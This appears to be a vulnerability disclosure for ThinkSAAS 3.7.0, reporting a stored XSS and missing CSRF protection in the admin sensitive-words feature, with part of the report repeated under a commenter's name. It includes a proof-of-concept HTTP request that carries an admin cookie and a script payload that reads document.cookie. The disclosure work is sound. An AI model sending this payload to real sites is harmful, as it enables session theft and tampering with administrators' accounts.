ThinkSAAS 3.7.0 has a storage XSS vulnerability. Among them, the request filtered by background - security center - sensitive words does not have CSRF verification. After the administrator clicks the malicious link, it can not only affect the normal business logic through CSRF vulnerability to add or delete any sensitive words, but also cause storage XSS vulnerability.
Details
It appears in app/system/action/anti.php, such as the following parts:
In the above section of code, the contents of $_POST['word'] are used directly to create new sensitive words without any filtering or checking, making it easy to inject dangerous content.
Proof of Concept (POC)
POST /index.php?app=system&ac=anti&ts=worddo HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.289 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: ts_email=admin%40admin.com; ts_autologin=a21tr9l9wg00w8swgwckks4g0cskw8w; timezone=8; username_c1aa741a=admin; token_c1aa741a=5215abf192a064ccc90d9518304b966ee972689be2ca9d82e4bbd516b3301a6e1712987537; addinfo=%7B%22chkadmin%22%3A1%2C%22chkarticle%22%3A1%2C%22levelname%22%3A%22%5Cu7ba1%5Cu7406%5Cu5458%22%2C%22userid%22%3A%221%22%2C%22useralias%22%3A%22admin%22%7D; http304ok=1
Connection: close
word=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E
Hebing123
commented
6 months ago
Summary
ThinkSAAS 3.7.0 has a storage XSS vulnerability. Among them, the request filtered by background - security center - sensitive words does not have CSRF verification. After the administrator clicks the malicious link, it can not only affect the normal business logic through CSRF vulnerability to add or delete any sensitive words, but also cause storage XSS vulnerability.
Details
It appears in app/system/action/anti.php, such as the following parts:
In the above section of code, the contents of $_POST['word'] are used directly to create new sensitive words without any filtering or checking, making it easy to inject dangerous content.
Proof of Concept (POC)